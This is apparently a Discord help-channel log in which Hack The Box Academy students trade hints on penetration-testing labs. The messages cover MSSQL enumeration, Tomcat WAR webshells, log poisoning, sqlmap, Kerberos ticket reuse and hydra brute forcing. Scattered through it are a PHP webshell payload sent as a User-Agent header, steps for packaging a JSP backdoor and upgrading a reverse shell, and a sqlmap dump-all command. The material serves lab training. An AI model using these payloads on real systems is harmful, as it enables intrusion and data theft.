mssqlclient.py 10.129.62.213 -u mssqlsvc -p 'princxxxx' -windows-auth

like that?

yep

mssqlclient.py: error: unrecognized arguments: -u mssqlsvc

what is wrong???

mssqlclient.py username@target-ip -windows-auth
mssqlclient.py -p 1433 username@target-ip

oh wait forgot you need domain syntax

add .\\ to your username

give me one second

I am generating new target

can confirm everything is working as intended

it has been expired so

@vital adder that is not needed

hmm,,,what should i do Mr or Ms Lee?

this

ok i am trying to access

either of those command syntaxes should work

then you run through the enumeration using the mssql format

instead of show databases it's select name from master.dbo.sysdatabases

since it's windows based; capitalization does not matter

mssqlclient.py mssqlsvc@10.129.118.29 -ip -windows-auth

mssqlclient.py: error: unrecognized arguments: -ip

don't need -ip

wrong F ing tool 🤣 sorry @neon depot

????

i am new pleasee///

come on

their syntax target-ip is one word

i know all of you is old and knew all of htb

Geez

i only just learned this like last week as well dude

we are leading you to water

give me the mercy

up to you to drink it

i am already drinking beer

brother

you need monster energy

just take the -ip out of your syntax

that's all

i took it alredy no more 2

and it should give you the prompt for a password

Password:
[] Encryption required, switching to TLS
[] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>

ok

whay should i move forward

read the section

it tells you how to enumerate with sqlcmd/mssql

literally I scrolled back up and down the page to find the commands and answer

?x target-ip

i swear to god bro

it is my first time to hack whatever please///

start from the part that says "SQL syntax" on this page

if you STILL are stuck after an hour somehow then ping me

I am pure virgin

i'm telling you how to find the answer

it's on the page

What you need help with

sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

This one?>

no

we are already in using mssqlclient

SHOW DATABASE ?

i aready used to gind the

find

no

the password

wdym

with mssqlclient we are using the command syntaxes with the black background

the only thing we don't need to do is type "go" afterwards

EXEC master..xp_subdirs '\10.10.110.17\share'?

this one?

mercy for virgin

you already signed in with the mssqlsvc user yeah>

yes

also you're jumping too far ahead

like i said

start from the top of the syntax section

look how it's telling you to find information

I mean

that part is for hash stealing using responder

which is the other intended way of getting the mssqlsvc password

that part can be ignored entirely

more specifically it tells you how to show databases

Sorry it made me confuse a bit

like I said take it from the TOP of that part

all the way up

Because you mean that I have to walk through again when I got password?

to right after it shows how to connect

no

you are logged in with mssqlsvc

you do not need to get another password

Ye a I am

you are the user you need to be

start from this part of the page

and work your way down

Module: Attacking Common Services
Section: Skills Assessment - Medium

Just finished ACS Medium after getting stuck, The key thing is thorough enumeration of the services.

Hint || -p- all ports ||

the good ole "this port does nothing"

SQL> mysql> SHOW DATABASES;
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Incorrect syntax near '>'.
SQL>

sorry what do you mean sp far?

show isn't an mssql command

and it looks like you copied the whole line

as well

you only ever need to copy after the > in the examples generally

again mssql is the linux comparable sqlcmd; so you need to go through the ones with the black background

as those will be the commands that will help you

mysql commands are only for mysql/mariadb servers

so the lines you're looking for start with 1>

Ok l with

but it sounds like you also need to spend more time actually studying and taking down notes in general
as I was able to find this information readily available on the page
it sounds like you are just trying to blitz through all the content and not actually learn anything
being a "virgin" or "noob" is not an excuse. not taking good notes will only hurt you in the long run

being frustrated at something taking time is normal; but to learn you need to really evaluate how you're going through content. If you genuinely need help on how to take good notes or what good note taking is you can probably google

for instance; nmap shows port 1433 open - states it's mssql service -> use mssqlclient.py to connect; use sqlcmd/mssql command syntax to complete. If you don't know what the syntax you need is - reread the section and take notes on things

as select name from master.dbo.sysdatabases is universal across pretty much every mssql interface to get a list of all databases

Hey, I am doing the SMB chapter in the footprinting module. At the beginning, the lesson talks about creating a share on the server. It doesn't explain how to do that. I can continue on, but I am just curious if that is on purpose or not.

it's not important for this module that's why it's not talked about; modules where creating a smb share is needed they talk about how to make one

Can someone help with Local File Inclusion Log Poisoning? Im not sure what im doing wrong.

everything :^)

Hi everyone, I'm currently stuck at Attacking Common Applications - Skills Assessment II - I've found Nagios in gitlab but I dont know how to access. Please give me a hint

For the love of god PLZ help me.

if you use double quotes try single quote or the other way around

did you add the target ip with the subdomain in to your hosts file?

i have scan with ffuf and have the list vhost. But idk exactly which one

just add all vhost you found into your hosts file and check / enum each one

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'

For this code?

i mean the payload <?php system($_GET["cmd"]); ?> or <?php system($_GET['cmd']); ?> but i do it in burp so not sure if that will work

I'm having a hard time getting the burpsuite part to even work.

Ive tried with one and two quotes.

Hello, Just wondering if on the Footprinting Academy Module - Footprinting Lab - Easy that looking at the hint to gain the credentials to the FTP server is actually required? Or is there another way to gain the credentials ie hydra brute force?

Hydra bruteforcing I think

Bumping old message for help. I've just finished the hard skills assessment for the module but I just can't seem to crack this hash for the mssqlsvc user. Is this the right path?

Hi (I hope I'm in the correct channel) I'm currently doing network enumeration with nmap. I have a technical question about the status.php page in the easy/med ans hard courses (ips and ids evasion) the counter on those pages goes up and down automatically.. Even when I do not interact.. Is this normal? Sometimes it just resets at 0 and most of the time when the target spawns it's already at 5 (or so) alerts. I don't mind the challenge though...

Currently doing the hard one... Let's see if this one is as easy as the prev 2 😆

Did not interact with the host and during my writing here it skipped to 30...

32

🤣

Does anyone know, why I'm getting a connection timed-out error?
When I am running smb_enumshares on metasploitable 3

[*] 10.0.0.4:139     - Starting module
[-] 10.0.0.4:139     - The connection with (10.0.0.4:139) timed out.
[*] 10.0.0.4:445     - Starting module
[-] 10.0.0.4:445     - Error when trying to enumerate shares - STATUS_ACCESS_DENIED
[*] 10.0.0.4:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed```

metasploitable 3 and kali linux both are on the same subnet.

I restarted metasploitable 3 and kali linux a few times but everything same here.

I don’t get the new task 11 😄

It’s “Congratulations”

I'm completely new to htb and I'm only just acquiring skills with Linux and co. can you tell me how to get there? so to the solution

if you form a question, we might be able to point you to the solution

Elaborate more

Welcome to the world of Linux (been using it for about 8-9 years.. Not wanting to get back to Windows after it)

Hi,
I'm stuck on the engagement at host1 in the shell & payload module.
I have find the two upload vuln.
In tomcat i have tried with metasploit and with war file upload but nothing work, metasploit not open a shell and with the var file i have an error 500.
And with the second file upload is the same,
I managed to upload shells but none of them work.

hey all present here , im new to this server

idk if this is the right place to message,but as i dont have permission to any other channels,im msging here

im a guy from India who is 16 yrs old, as a teenager it obvious that i have keen interest in learning about hacking and coding stuff

but the thing is that i dont evn know a single thing abt coding

its my greatest wish to learn hacking

is anyone here who could help me from zero?from the basics of everything?

@everyone

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@hushed smelt ^

yes?

so

i gotta start from there

ok

done

thanks buddy

jesus F ing christ when tf did they change that assessment?? but hint you are on the right part just remove the first 10k password from the mutated wordlist i'm dumb

that part is just a simple tomcat rev shell here is a bunch of method you can use
https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/

try with the double quote try adding &cmd=id at the end you'll know if it worked

i 100% remember that list is 90k but i just check my and why tf is it 187k + (forgot to use sort)

if you make the wordlist with the sort command the cred should be just a bit over ||1k|| and it should take like a few min with hydra also try setting your TASKS number in hydra super low or else it will crash the target machine

is there anbdy who completed medium lab common services?

i cannot brute force the ftp port

just finished attacking enterprises, what a mission

had to peek a few times for hints unfortunately

Hello colleagues I connected to ssh but I do not see the print banner.

try on pwnbox

Thanks for your reply.
I was not in front of my computer.
This is what I do but for example with metasploit it doesn't work and when downloading a .war file I get a 500 error when I call the file.
On the forum others have had the same problem as me but I don't know how to solve it.

If you're stuck where I think you're stuck--where I got stuck for a while--I got unstuck by re-reading the note on the PHP Wrappers page in that module.

hey am facing a problem, am trying to cretate a fully interactive reverse shell, i press ctrl-Z to the nc lisener, then i type stty raw -echo and then fg, but then i cant use enter to reset i get ^M

need to hit enter TWICE

are you doing this on zsh or bash?

yeah automatic uploading and executing the payload with metasploit isn't going to work for this and i think this is intended

I am not aware what do you mean by zsh or bash, but am running on a kali linux terminal. By hitting enter twice, when I have to hit the enter twice ?

Well when I make a .war file I get the page with my webshell but when I execute a command I don't get a return either.
Normaly is simple to do that ...

did you try multiple shell? also give the jsp_win_cmd.jsp shell a try it's at /usr/share/davtest/backdoors/jsp_win_cmd.jsp

before that just run zip -r backup.war /usr/share/davtest/backdoors/jsp_win_cmd.jsp to make the .war file

not to be a smart arse bro but if you dont know what bash is, it may be best to do a few of the fundamentals modules

im not being smart, thats my honest advice

but if you want to proceed, these are my notes on this issue:

i know what bash is, i play with bash scripts a lot, but i dont know if am using bash or zsh.

If using bash on attacking machine:

stty raw -echo
fg <ENTER>

If using zsh on attacking machine:

stty raw -echo; fg <ENTER><ENTER>

you're probably using zsh

so try that

(i assume you've done something like python3 -c 'import pty; pty.spawn("/bin/bash")' in your session ?

yes

ok, then i would do stty raw -echo; fg <ENTER><ENTER>

thanks a lot for the help am on it rn to try it out and let u know

good luck!

I have an error 404 with this.

the only 2 shell i got in my note is that and java/jsp_shell_reverse_tcp

it worked thank you very much

awesome mate well done

HTB academy didnt teach the slightly different approach for zsh

thats why it is in my notes lol

Hello colleagues I connected to ssh but I do not see the print banner to answer the CLI windows question.

I have tried the shell you suggest with the first process and it's the same, i have the webshell page with the form but when i post a command I don't get a return.

no idea

give me a sec i'll give that a try

Hello folks! I'm stuck a bit. Could someone lend a hand. Here's the info. I'm on the SQL map Essentials module. Attack tuning section. Question 2. "What's the contents of table flag6? (Case #6) " The hint is, Use the prefix '`)'. I've used that prefix. I've tried everything. The vulnerable parameter is COL and is a GET request. I will find that the parameter is vulnerable, but before I have a chance to dump any info I get booted from the server. I'm assuming because I'm running too high risk/level but that is the only way I'm finding a vulnerability. Can anyone give me some insight please?

how are your framing your command

Oh it's ok.
I can run the hostname command i have a return but with another command it's not good.
i will continue to search a good command that's works fine ...

sqlmap -r sql.txt --dbms=mysql --prefix='`)' --level=3 --risk=3 --dump-all That was most recent attempt.

Incredible i just can run 'hostname' all other command return nothing ...

Hi Im stuck in FOOTPRINTING, IMAP / POP3 & Footprinting Lab - Medium, firstly in IMAP I aaccess to the service using claws-mail an got the second flag, also tried accessing utilizing openssl and only found that flag, im stuck in this question + 1 Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...}), secondly in the medium lab i found creds in nfs, enumerated smb and found creds for user sa, tried to access rdp and couldnt what should i try next?

im trying to connect to the machines but im not getting any live hosts

im connected to the eu location

not sure what im doing wrong

using the "lab_" vpn config I am able to connect to machines right?

i think lab_yourusername.ovpn is for hackthebox not the academy, you should try downloading from the academy webpage the following file academy-regular.ovpn

WOW. I've been struggling with that one for a while. I try a new command today after some thought. Then post here. Annnnd found the flag. lol. Perhaps I should have posted here first and it would have made the hacker gods happy and worked lol. Thanks everyone.

Machines like "precious" are in academy or labs?

By the way thanks a lot

those machines are in labs

weird

so why do you think its not giving any connection

sorry for the delay but everything is slow af on my end but basically after each command that shitty name in the url will change

how did you get the answer to the first question?

oh yeah sorry for not replying to your dm (i forgot 🤣) but that command should work not sure why it didn't the first time

in which problem do you refer the lab, or the imap

imap\

I used the method from the first question to answer the next 2

with openssl or nmap?

Yes the name in the url changes well but I have no feedback.
The only thing that is ok is hostname
A simple cd to show my current directory doesn't work like everything else

I actually used curl on the first

dm me

it's a webshell you can't cd ../

ok

cd it's just for display the current working directory.
I have tried dir C:\Shares\ and more but nothing work
I think I'm tired and stupid 😅

do pwd and start working from there

that or this old shell is dumb

i think a meterpreter shell is better although you just need to run 2 commmand

pwd it's was my first reflex but not work ^^

looks borked

get a better webshell

the only reason i use and suggest this stupid shell is the given attack box don't have access to the internel so to be able to get a better shell you have to download it on to your or the pwnbox machine and then upload it on to the given attack box and then the taget

and this is the only default working shell (jsp for windows) that i can find

I have tried with another webshell but when i submit a command i have a 404 ...

what module is this?

The live engagement in SHELLS & PAYLOAD

host 1

oh yeh, that bloody shitty foothold one

i didnt take extensive notes sorry

id suggest a different webshell tho

Thanks i will continue for find the solution.

which host are you working on

Hello guys

I'm on the Foothold host

sent you a dm

I need help with the Windows Fundamental module, section (Introduction to windows)

Just did the xfreerdp thing and remotely accessed the machine but can't find the answer to the questions asked

start powershell then

Okie, thanks! Just found a way to get through to PowerShell

Grt! I've fixed it.

But I dunno how to find the Windows NT version

you are diffidently a life saver !!!!

Get off the roids, the last thing you need going thru cpts is roid rage 😜

Computer parts will be breakinf

hahahahahahhahahaha, 2 monitors down

3rd is standing strong so far

Can anyone here help?😢😢

Control panel > System

Hi

How can I authenticate on the user1 machine in windows to answer it does not come up as logged in?

you need to give us context. What module, what section.

introduction to windows command line

the user1

SSH to with user "user1" and password "previous flag"

At the moment of authentication it does not allow me to continue with the following question

I remain in the banner but it denies me access.

Hey were you able to figure this out?

that is a new module that I have not done sorry

thank you

@lethal atlas thanks

i can assist you if you need help

i would think it would be as simple as ssh user1@<target ip> then entering the flag from the previous question as the password

anyone get errors when trying to copy/paste from pwnbox to windows victim via xfreerdp?
[WARN][com.freerdp.client.x11] - failed to get clipboard data in format UTF8_STRING [source format CF_UNICODETEXT]

@lethal atlas I tried that way with the answer and in fact I can no longer access the first ip.

likely need to respawn the target

Permisión denied

hmmm let me log in and start that module.

Stuck for a couple days. Can someone please help me with the Command Injection Module Skills Assessment?

i said I could help you

Thank you. Dm.

Howdy, if anyone needs help please feel to dm me! I sometimes get busy so forgive me if it takes time to respond. Putting the names of the modules I have completed for people searching for help can find this message:

Modules completed:

Getting Started, Network Enumeration with Nmap, Footprinting, Information Gathering - Web Edition, Vulnerability Assessment, File Transfers, Shells & Payloads, Using the Metasploit Framework, Password Attacks, Attacking Common Services, Using Web Proxies, Attacking Web Applications with Ffuf, Login Brute Forcing, SQL Injection Fundamentals, SQLMap Essentials

Hey, I'm doing the linux fundamentals module and after logging in to the target via ssh its asking me "What is the name of the network interface that MTU is set to 1500?". I have no idea what this means, I'm fine with doing some googling but I've already done that for the previous 4 questions and its getting a bit tiring, am I missing something or does hack the box just give you a question without telling you how to answer it and then expect you to google for half an hour to find it?

I am on Remote Pass Attack - Network Services and having issues with WinRM user:pass. The rest of services were fast and easy. I did notice default port 5985 to open up here and there but winrm is running on a much higher port. Am I chasing a ghost?! I have narrowed down to 2 possible users that have access to winrm and neither of those are cracking.

Update: Make it 1 user, since he is in a particular local group. Had his password all this time but no luck logging in via evil-winrm

Hello!
I joined HackTheBox academy today and so far the fundamentals are a blast. I started browsing the various paths and modules and am a bit unsure of which is best suited for me. Do any of you have a path/module recommendation if I want to focus on writing websites as securely as possible? I'm more interested in the defensive aspect. Thanks in advance!

I'm currently doing 'Web Requests' and am thinking of following it up with either 'Introduction to Web Application' or 'Javascript Deobfuscation'. Are there perhaps any other relevant modules anyone can recommend?

I would suggest doing the "Bug Bounty Hunter" Job Role Path if you are interested in developing secure websites. You will get to know the different vulnerabilities and attacks that can be abused, and subsequently, you will be more capable of defending against them.

Hello! I`m working the bash scripting, currently stuck with this section, can anyone give me some guidance in the flow control loops section?

The question is this one: Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

I can`t copy the script cause it's very long... has anyone done this module?

can anyone give me some help in the attacking common applications module? im on the joomla section where it wants you to exploit using the joomla_dir_trav.py script and it will not run for me. says that the module 'click' is not installed. i try to install using sudo pip install click or sudo pip3 install click. both say click is already installed but for python3. the module wants you to use the script in example as python2.7 since it doesnt work for python3. how have people been able to work around this?

Seems it`s the way you are supposed to learn... Many ways of solving the labs are not given in the readings... For me it's very difficult and I constantly ask for help here in the channel or in the academy forum...

I would add to what @kind turret said and say if you are looking not at the web side but looking for internal blue team oriented modules i would check out the Certified Penetration Testing Specialist path. both CBBH and CPTS has a bit of overlap but then divert in what is taught to specialize in one or the other. so either one you choose you can always go back to the other and have a headstart on some of the things the other path will teach you.

I would recommend to be thorough in taking notes as the material can be rather dense at times and sometimes not intuitive for people.

Nvm. This was apparently an issue with evil-winrm 3.4. Used pwnbox and worked just fine, v3.3.

yea seems like hack the box is less about teaching you and more it saying "Go find this this that I wont explain the importance of or how you should find it"

and then it just moves on as if you actually learned something

In the end you are just paying to get a certification... It`s up to you if you if you really want it...

Can anyone help me with Pass the ticket from Linux? I am doing "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."

this question and successfully got the flag.txt but seems like flag is not working

So we know the question is referring to a Network interface. So in terminal think about network command that you have used, and run them. Read the results and the details and see if you get something on MTU. 😉

you need to download the file from smb

i downloaded the flag

and locally you can read it

and i correctly got the flag but its not working

check for white spaces

For those running with issues using evil-winrm. Make sure to compile needed readline feature for your specific ruby version. Under Remote Path Completion on their github page.

can i dm you @autumn pilot

not sure how much it will help, but go ahead

I did that, found the answer and moved on. Its just tiring having to do 5-10 mins of unnecessary research on a question without hack the box explaining the importance of the answer and not even explaining some commands needed to find some answers

does it not tell you about the ip a command?

I get doing your own legwork but I don't see the point when you're not even told what the legwork you're doing means

isn't that the core of cybersecurity?

everything that you do in cybersecurity you will have to research

Hold on to your butt, cuz it's gonna get worse. :p however learning is growing, it's strength. Far easier to give up than try harder.

5-10 is a lot better than 30m to 5 hours

I just spent 2 hours troubleshooting evil-winrm :puphyper: shit just happens sometimes

Yea doing your own research is but if hack the box claims to teach you cyber security I'd expect them to at least explain what you;re doing

instead it just says go do this and find this and moves on without explaining at all what you just did

it does teach you cybersecurity

don't expect to be spoonfed

I dont

forkfed

forkfeeding soup

but I expect to be told what im doing instead of it just moving on after I completed an exercise

you are free to do the research

it is up to you if you want to do it at the end

for example

then whats the point of using hack the box if it doesnt teach it to you and instead just gives you a few prompts, doesnt explain it at all and then asks $450 a year to continue?

from the top of the page

The odds are you will seek help, you find it, you will interpret how the question was correctly answered and then the "ah ha!" moment will hit and it will make sense.

yes thats not my issue, my issue is it doesn't explain the importance of it

it's a minor thing; mostly used for getting your IP for reverse shells, and the IP of jump/pivot machines so you can do port forwarding magicks

Its like if I was to teach someone how to speak french and taught them how to conjugate a verb in the imparfait without explaining when you will use that tense or why its important

is french an universal language like the one computers are using?

you're making a mountain out of a molehill on this issue dude

no? what does that have to do with this?

Good Luck everybody, misery loves company, I'm going back to my studies.

look, rather spending the time to rant you could have spent the time to research and learn something new

So you guys dont see any issue with paying $450 a year to be 'taught' something and then being told to do all the research yourself?

dude this is a fundamental course; it's not a big issue - the more in-depth courses tend to be better at explaining

that module doesn't cost $450

okay thank you, this is what I was asking

and that is 1 module out of the dozens

go back up to my original comment I just wanted to know if this would be consistent throughout the rest of the modules

on top of that you are free to provide a feedback, but most probably provided in discord will get lost

It sounded more like you were complaining, not asking a question until you phrased it

also after each module there is a "provide feedback" option

My bad, I was wondering if the entire experience with the rest of the modules would be the same, even with the payed ones

You're hardly told to do everything yourself lol. The htb certs are some of the best I've seen. Yes, sometimes you'll need to do a bit of your own research. That's the nature of this field.

then learn better phrasing; it will help you ask better questions as well

I literally phrased it the same in my original comment, learn to scroll up

Because of how quickly things change in cybersecurity, it's nearly impossible to always give you every single piece of info you'll need.

I don't want or expect to have my hand held throughout every exercise, I just want to be told what im doing/the importance of finding the name of the network interface

it's giving you a taste of sometimes you'll be given 90% of the way to solve the problem - the other 10% can be inferred. Tools are often talked about in the module or section

like I screenshot and showed; it talked about the ip command

yea it talked about the command, but it didnt tell me what I was doing when I found the name of the network interface that had the MTU set to 1500, it just said go do it

and most commands also have a man <command> or <command> -h

I know what the command does, I don't know what the importance of the information I found with it is

Fuck Dante Labs people keep trolling and shit

I want my money back

ok then I'll break it down for you:
Say you need to scan for other hosts on an internal network to port forward/pivot to, you will need that Internal IP to come back to not the 10.x.x.x one.
ip a tells you every network interface that is connected - usually with htb you'll see a tun0 or something that's the <spawned ip> then other interfaces, sometimes one, sometimes 2

either submit a ticket online if you're actually serious or verify your htb account in #bot-commands with ++verify and ask for a nudge in #prolabs-dante

I am lol

coming into the academy modules chat and bitching about it does you absolutely nothing lol

Yes it does

at least post in the #1024429874246590575 where it'll be more likely to be looked at by staff

Thanks, now if only the htb courses actually taught you like any other online course instead of just asking you to answer a few questions

different modules will be more in-depth about teaching you

I hope so

and "just asking you to answer a few questions" sure if you don't read the section that the question contains

the section does not mention the importance of anything regarding the network interface

because it's rarely ever needed unless in situations where you need to pivot; and the modules that do talk about it talk more about the importance

the importance is that once you progress further you might see a computer that has both an external and internal networks

alright

@kind turret @devout cliff thank you both for the suggestions. Will look into this!

hey guys

lol

yh i clicked the link

<@&861185840277487616>

?

The yt link they posted

Looks like they may have deleted

Hmm other mod deleted it

Wassup? I have finished the module

I need some help
Q. Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
Module: PtT from Linux

|| I found the location of /etc/krb5.keytab. exported it export KRB5CCNAME=/etc/krb5.keytab Then tried impersonate with kinit LINUX01$.INLANEFREIGHT.HTB -k -t /etc/krb5.keytab ||

But I get this error

||kinit: Keytab contains no suitable keys for LINUX01$.INLANEFREIGHT.HTB@INLANEFREIGHT.HTB while getting initial credentials ||

@foggy light Where else are they stored?

Hint: what is the service that is running the realm look for that folder

@foggy light There is another location that stores valuable info on kerberos info/creds

Login Brute Forcing - Skills Assessment Service Login:

Anyone mind providing some help? I understand the proper path but still the brute forcing is taking longer than I know it should. Just wanna make sure I am doing it right!

Tip: cry 🙃

already pass that 😛

guys. I might be blind or something. cant find anything

😢

cry harder

kek, look at the sections notes, the useful info will be under the crontab sections

Do realms to see what service is running the kerberos program

Then do the find to find what folder it is (without the 'd')

can I DM you ? @fathom pendant

The other thing you can do is look closely at the example images

I'm not at my computer

Did you look at the section I mentioned?

the other thing i found is this

nein

@foggy light Look at the finding ccache files section

As far as i Know mainly 2 location have ccache file || /tmp and /etc/ ||

@foggy light see if you can use the find command to find any files pertaining the word ccache

also, one reason why you cant use those files is because they're locked from you. but theres a user that can read those files that you have access to(should've already compromised that user if you done the previous quesitons). the hint to what user that is can be found in the output of the realm command, see what groups have access to the machine

Hello Can I ask for help on Protected Files?

it says I need to use cracked password for Kira but seems like there is no credentials with Kira

should I crack it using hydra?

It's the password for kira you cracked previously in the module

Also lowercase

Ty

Hi, I just pay for subscription and got confirmation from paypal, but it is not activated in my account. Any idea why ?

I ever got the burp thing to work but i used the first method to get the question and flag.

@sinful falcon Experiencing the same problem!

Hi @pastel ginkgo , that was an interesting comment that , you first used intruder to filter out the payloads that were working and then selected those payload to use again in intruder to browse to the each generated URL. How were you able to do that? I googled and read portswigger document but only find pre-processing actions..none were we can combine payload -> pass run-following-action.. kind of method. Could you please share?

reach out to support

you just use the same list, once on upload and then once for checking for shells. you just inject at a different spot

easier if you use ffuf and not burps slow ass intruder

I was able to get long list of payload (many-char-bypass X 5-6 PHP extensions) so kind of 100+ payloads which got uploaded, so first problem i was facing was that to get this list of payload which passed (as there were many which didnt). Tried alot to find a way to get a way to copy only the passing payload from intruder. Then when i wrote to you , i was thinking in wrong direction that while checking the URL (with payload) , i need to only keep URL till php/phtml/pht and remove special chars (like &,.../ , X00)...realized i was wrong. And finally able to solve the excercise.

Thanks for responding. I agree using intruder is slow in community, but i am using a profession burp..so it was not a problem for me

burp pro is super overkill for these modules but hey whatever floats your boat and doesnt sink your rubber ducky

how do i get the list of groups in AD im part of through CME ?

i think cme has the -x or -c syntax that you put at the end to have it run a specific command once it finds/uses a valid login

hi everyone

can someone help with the password attacks module. im on the active directory part. i have made copies of the NTDs.dit file and im tryin to file share it back to my host machine. but im getting the same error

try specifying a filename

as in \\yourip\share\filename

I’m a little lost on Attacking Common Services: Attacking email services. I’ve attempted to utilize smtp-user-enum with the provided resource username list from the module but none of those usernames exist.

attacking sql is expecting you to do the Responder hash grabbing

i think

its specified "cmd.exe /c move C:\NTDS.dit \10.10.14.177\CompData"

My apologies! I don’t know why I put Attacking SQL databases. I meant Attacking Email services

do a full port scan

just try :)

is this what you mean?

I see 3389 open but would need creds/hash to connect. Attempted previous creds/hash from previous sections. Didn’t work. Pop3 and imap open but would need credz as well or am I wrong? Found the domain with full port scan and mapped it to the target ip address and attempted the smtp-user-enum with that domain but didn’t work.

What I ended up doing is using smtp-user-enum and tried all 3 modes one at a time, specified by the -M command line operator ||RCPT, VRFY, EXPN || using the provided username list in the Resources tab. My thinking was if I could at least get a valid user that will drastically reduce the resource requirements for a hydra brute force

I just redownloaded the username list from resource to ensure I was utilizing the correct list. Attempted all 3 modes and didn’t get any hits for users

I just tested it myself and found the user || smtp-user-enum -M RCPT -U username.list -D inlanefreight.htb -t <spawned ip> ||

Oh shoot. I was utilizing the domain I found in my nmap scan for port 3389. Thank you! That worked!

Hey all, working on the kernel exploit module for linux priv esc. Can't seem to compile the exploit on my Kali box, or when I can I can't get it to run on the target. Error message when I try to run on the target:
htb-student@NIX02:~$ ./exploit1
./exploit1: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit1)

Trying to figure out what I need to tweak here. Tried installing a updating a few different things

google it is the short answer

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_pwsh?view=powershell-7.3 scroll down a bit

literally the first thing you should do is ask google; if google is not providing a sufficient answer then ask elsewhere such as #1024429874246590575 as it is not necessarily tied to a module and they want to keep this chat as on-topic to module content as possible

I have a quick question on this module https://academy.hackthebox.com/module/147/section/1328 Password Attacks: Password Reuse / Default Passwords
is it asking to find the password to the MySQL account or to who can use MySQL?

Hey i have an idea that would make profit. I want to make it happen.

I need someone who can code.

I need bot that does basic stuffs.

it's asking for the username:password combo as stated in the question

yes i understand that part. but is it asking for the mysql account password combo or the user account that can open mysql

It's stating; that using the credentials from the previous exercise ssh into the system and determine what credentials can be used to access MySQL

the DefaultCreds-Cheat-Sheet is useful

got it thanks. i guess it failed the install a few times so i had to run it from the folder.

yeah

good thing mysql only had a few

Hello, I am having great difficulty completing the PassTheHash topic in password attacks module. I am stuck on the last step where you have to setup a nc.exe on the host machine to pass the hash and connect to another machine on the domain. I have followed the steps exactly, but no RS is connecting. I have type 'ipconfig' and tried to use both IPs that were there. I have tried to use Different PS Reverseshell scripts but no avail. I have tried different ports, but nothing works. Looks like the domain firewall is off so I dont see why the RS is not working. Not sure where to go from here, seems like someone in the forum couldnt get a RS either and used LOLbins to somehow connect to the target. Any help? thanks so much, dm me plz

Password Attacks - Hard Lab
I got the file .vhd on my linux machine and I'm not sure how to continue? please if anybody could help me here or in dms I'd really appreciate it🙏

Hey, I'm doing nmap's medium lab, the one where you find a host's DNS service number, and I think I'm doing the correct thing but nothing's happening

actually I think I might have something?

File Transfers - Protected File Transfers
I want to transfer Invoke-AESEncryption.ps1 to a Windows host that is not connected to the internet so I cant download the script directly from the win host. I am connected to the host via rdp. What I want to do is download the Invoke-AESEncryption.ps1 to my kali machine and then transfer it to the victim. However, I cannot seem to download the script to kali. It always downloads the html file of the page instead of the script. How can I download just the script? Thanks in advance!

What URL are you trying to download from?

https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions/Invoke-AESEncryption.ps1 this one is given.

It doesn't look like this site offers any raw download method. You'd have to either rig something up to extract the data, or manually copy/paste it.

Yeah, indeed. I was just wondering if there's some clever way to do that. Maybe also via github since I found the same script there.

I have problem crackmapexec doesnt go trough the list. Instead it just takes it as the username

Try giving it a full path to the file

i did that

I mean completely full path, with the /opt/useful/etc...

Hello everyone, im trying to verify over #bot-commands but i can't find my HTB Academy account token on the website, all i see is student id

there isn't one, the discord token is only available on accounts created on hackthebox.com

not academy.hackthebox.com

Is anyone goood at automation?

Ah yes that worked thanks!

thank you, i was going insane trying to find that

so i need to create a new account over hackthebox.com right?

I need sort of automation that click on specific section depending on situation

yes

https://tenor.com/view/thank-you-very-much-elvis-presley-dance-gif-14562708

I'm trying to run responder and inveigh in the AD Enumeration & Attacks - Skills Assessment Part I lab, but I'm not able to. What am I missing? Should I convert inveigh.ps1 to Inveigh.exe?

What do you mean when you say you're not able to? Are you getting an error?

For example, I run Responder.py and it just hangs. I get no output

and what did you get from inveigh?

I have the same problem...for two weeks. Any improvement?

You might want to go back over the sections that cover using inveigh.

I'm stuck on this question I don't understand it well Use the tasklist command to print the started services and then sort them in reverse order by name. The service name starting with "vm" is the flag for this user.

can i help me?

What was the issue here? Same problem. Can you help? god, found it...

Hi ! im stuck in the "Information Gathering - Web - Skills Assessment" with the following question : 'Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?' i tried with cURL, dig and nslookup , i tried on the main domain too but i cant find something relevant. Could someone give me a hand ?

Use AutoRecon.

Would you like to come in private 🤔

Check this out. If you then need to know more, send me a DM. Tib3rius has also placed an instruction video on YouTube. https://github.com/Tib3rius/AutoRecon

Guys.
Need a little hint on Broken Authentication -skill assessment

I am just mathematician.
Strategy is going to work. 1 cent for 10 second

I need automation to that.

yeah this is not the place for that

sure what's the issue?

I found some users and their passwords,

if you just look here about that file you can probably find the answer of what that file is

sure shoot me a dm if you still need help i'll help you troubleshoot

if the ||support|| user?

yeag

got the cookie "something":||md5||

but I dont know how to enumerate the role)

it's also ||md5|| 🤣

i think what you have got is the role

yeah it looks like but https://crackstation.net/ can't recognise it

I don't know why:)

I've tried change the role from "support" to "admin" etc but still resultless

I don't have my notes present right now, but i remember this has something to do with the example given. Don't copy the example. Go to the revshell site mentioned, create your own she'll. Use both a different port and state the target by IP not by hostname (DC01 or something).

one of the thing you try is almost right

hint just are ||missing 1|| thing

